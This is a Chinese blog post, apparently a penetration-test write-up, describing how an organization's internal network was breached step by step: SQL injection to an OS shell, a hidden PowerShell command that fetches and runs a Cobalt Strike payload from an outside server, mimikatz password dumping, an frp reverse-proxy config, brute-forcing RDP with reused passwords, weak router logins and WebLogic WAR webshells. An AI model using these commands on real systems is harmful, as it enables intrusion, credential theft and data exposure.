记一次内网渗透(详细)

admin
admin
admin
140350
文章
117
评论
2021年5月8日12:20:50评论286 views字数 4365阅读14分33秒阅读模式

外部SQL注入打点进入内网

入口点,为某前台新闻页面id的SQL注入,网站没有WAF,可直接SQLMAP --os-shell获取目标shell

记一次内网渗透(详细)

获取到目标的os-shell后,利用tasklist查看目标进程,发现没有杀软进程,且目标主机出网,直接采用CobaltStrike的Scripted Web Delivery(s)托管powershell beacon脚本,远程加载上线CS

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxx.xxxx.xxx.xxx:8848/a'))"

获取到CS Beacon后,利用ifconfig命令查询目标IP,发现目标存在2个内网IP

以太网适配器 本地连接 3:  
   连接特定的 DNS 后缀 . . . . . . . :     本地链接 IPv6 地址. . . . . . . . : fe80::5834:a168:5cb1:11c2%15     IPv4 地址 . . . . . . . . . . . . : 10.68.1.102     子网掩码  . . . . . . . . . . . . : 255.255.255.0     默认网关. . . . . . . . . . . . . : 10.68.1.254  
以太网适配器 本地连接 2:  
   连接特定的 DNS 后缀 . . . . . . . :     本地链接 IPv6 地址. . . . . . . . : fe80::847:d1e5:14e:63ca%13     IPv4 地址 . . . . . . . . . . . . : 192.168.101.160     子网掩码  . . . . . . . . . . . . : 255.255.252.0     默认网关. . . . . . . . . . . . . : 192.168.100.1

这里发现,网络连接状态中没有公网IP,这里推测应该是通过端口映射将内网web站点映射到了公网(目标不在域内),且目标主机存在数据库(非站库分离)

之后利用mimikatz抓取用户密码

mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit

获取到用户密码:

administrator Huaxxxxx

为了进一步对内网进行渗透,这里采用frp进行反向代理,其frp配置了SOCKS5和HTTP代理,详细配置

[common]server_addr = VPS_IPserver_port = 7000
[http-proxy]type = tcpremote_port = 6000plugin = http_proxy
[socks5-proxy]type = tcpremote_port = 6001plugin = socks5

深入内网--工作组渗透

配置好socks5和http代理后,采用fscan对目标内网进行扫描(这里首先是192.168.101所在的网段),发现192.168.100.1存在Huawei路由器的web服务,其弱口令为audit-admin Aa123456

记一次内网渗透(详细)

其余没什么较为有用的资产。

对10.68.1.1网段进行渗透,由于是工作组,这里有3个思路进行突破

1.利用弱口令进行服务爆破,利用mysql udf,redis 未授权getshell / redis 主从RCE等(失败)2.对该网段进行web服务扫描,寻找web服务的漏洞进行突破3.对该网段进行ms17-010扫描和利用(失败)

利用fscan对目标内网进行扫描,共发现如下可利用信息

ssh 弱口令 8台FTP 弱口令 10台   mysql 弱口令 4台  尝试了mysql的udf提权(失败)redis 未授权 1台  尝试了redis未授权getshell (失败)mssql 弱口令 1台  web服务 若干(实际可利用大概一台)vsphere client  (大约8台)尝试了历史CVE漏洞,均失败

对web服务进行了扫描,发现该段web服务的弱口令绝大部分为网络设备,且存在vsphere client,可以确定目标网络存在域环境。其中在10.68.1.29发现了xxxx管理追溯中心,经过测试,发现输入框处存在以单引号闭合的SQL注入,由于目标不出网利用中继beacon成功上线cs。

内网中断网主机,做http中继上线CS过程

通过对外网的连通性测试(ping www.baidu.com),发现目标主机不出网,且目前只拥有os-shell

两种利用情况

1.利用os-shell查询网站根目录,在利用echo命令将一句话木马写入,采用webshell管理工具代理连接目标shell(情况不适用,目标目录存在多个克隆出的站点,无法判断当前使用的是哪一个站点)2.对于无杀软主机,可以创建用户,远程桌面登录上线CS beacon

利用tasklist发现目标主机无杀软,直接添加用户利用socks5代理登录远程桌面(篇幅有限,中继上线后续补发详细思路和教程)

记一次内网渗透(详细)

此时状态如下:

记一次内网渗透(详细)

之后就是对本机进行信息搜集,发现该机器内的数据库存储着大量的物品和使用人的详细记录(较为重要)

且抓取到了多组用户名密码,此时,密码信息为)

Administrator  Huaxxxx123 xxxxcssd Admxxxxxxx

通过此些密码对10.68.1.1/24进行rdp爆破,成功获取到了10.68.1.92主机的rdp远程桌面的密码(Administrator  Huxxxxx

对该机器信息搜集完毕,在10.68.1.99发现了h3h的路由器,并采用弱口令(admin axxxxx)进入管理页面,载器IP地址段分配处发现了部分网段的分配规则

记一次内网渗透(详细)

10.68.4.1进行fscan扫描,发现该网段存在少数web服务,但均是空白页面,无法访问,无弱口令,无其他服务(应该挺重要的网段),于是放弃对该网段的渗透

对于10.68.33.1,该网段为门xx部门的网段(很重要),尝试了对该内网网段的web服务探测,但是发现绝大部分的web服务无法访问,且rdp爆破无果,无如数据库,ssh等服务端口,但部分主机拥有ms17-010,利用proxychains4将本地kali中的msf带入内网,利用exploit/windows/x64/smb/smb_ms17010模块进行攻击,发现无法进行利用,便暂时放弃了这个网段

之后在10.68.1.11处又发现了一个锐捷的网关,利用锐捷的默认口令admin、firewall,成功登录

记一次内网渗透(详细)

在该网关的报表中心,发现了对历史网络状况的监控日志,其中发现,不少内网用户的网络行为经常访问以下IP

10.120.84.5 (xxxxxx结算平台)10.124.1.68 (weblogic管理页面)

于是尝试对10.124.1.68所在的网段进行渗透,同10.68.1.1/24网段相同,利用了fscan对目标的web服务,服务弱口令,ms-17010(均利用失败)进行扫描,发现在10.124.1.1/24下存在部分weblogic和tomact的示例页面。

利用weblogic弱口令war包部署获取webshell

此时我们的思路可以进行拓展

对weblogic的利用1.弱口令进后台部署war包getshell2.利用CVE-2020-14882 CVE-2020-14883 未授权访问绕过和远程代码执行的组合利用3.利用CVE-2020-14882 CVE-2019-2725 未授权访问绕过和xml的反序列化命令执行组合利用对Tomact的利用1.弱口令进后台部署war包getshell(可参考 https://blog.csdn.net/Blood_Pupil/article/details/88660728 漏洞复现之Tomcat后台War包上传Getshell)

这里最初没有尝试出来弱口令,所以刚开始利用了CVE的组合拳进行攻击,但是由于目标不出网,最初尝试了利用内网弱口令拿下的Linux做web和监听机器,来监听反弹shell,但均失败,于是尝试了对控制台的基本爆破,发现目标存在弱口令weblogic,wexxxx,利用弱口令成功登录,并部署war包成功getsehll

记一次内网渗透(详细)


同样利用此弱口令getshell了内网多台的weblogic控制台机器。

10.120.84.410.124.1.6810.124.1.54

之后利用哥斯拉上传了mimikatz来抓取密码

记一次内网渗透(详细)


此时我们的密码本扩大为了(这里为了隐私,未放出密码)

10.68.1.102  -- Administrator10.68.1.29  -- 123   -- cssd 10.124.1.68  -- windows   -- Administrator

利用口令爆破,撞库攻击获取主机权限

采用rdp对该网段进行爆破,发现存在大量的共同密码(这里的操作,相当于撞库攻击)

记一次内网渗透(详细)

此时爆破出了该段的若干台主机的rdp和ssh密码,我们的入侵点也瞬间扩大。尝试对每一台主机进行信息搜集,发掘我们想要的目标。

其中在部分主机的远程桌面记录发现了对其他网段主机的连接记录。例如

10.124.1.162 -->  10.124.1.70 (70为双网卡主机,其另一张网卡连接192.168.102.248) (主机出网)

记一次内网渗透(详细)

该网段似乎为办公网段,对内网进行扫描,并未发现web服务,和其他有用的服务(价值不大)

10.124.1.90 --> 172.128.16.213(目标主机不出网)

记一次内网渗透(详细)


这里发现了网段间奇妙的问题,发现只有10.124.1.90这台主机可ping通172.128.1.1段的网络(不知道网管是怎么设置的,没摸明白,但是觉得可能是网关IP白名单了)。并且该网段密码似乎通用,为rsxxxxxxx,通过观察,该网段似乎为下属的结款的系统(绝大部分都开着结款的web页面)

对内网进行危害收集

回到10.124.1.1/24网段,其中在10.124.1.57 / 10.124.1.64 发现了SQL服务器,里面存储着大量的数据信息(很重要的资产),尝试将这些重要的资产上线CS,期间发现了目标主机存在360,但是此时,我们已经拿到了rdp密码,所以360几乎毫无威胁,于是直接生成中继10.124.70.1的beacon,上线CS

此时,会话列表如下:

记一次内网渗透(详细)

总结:

最后在两台远程桌面上的oracle数据库上发现了大量数据,至此,这段渗透告一段落。。。。。。

记一次内网渗透(详细)


本文始发于微信公众号(Fight Tigers Team):记一次内网渗透(详细)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月8日12:20:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次内网渗透(详细)https://cn-sec.com/archives/368886.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息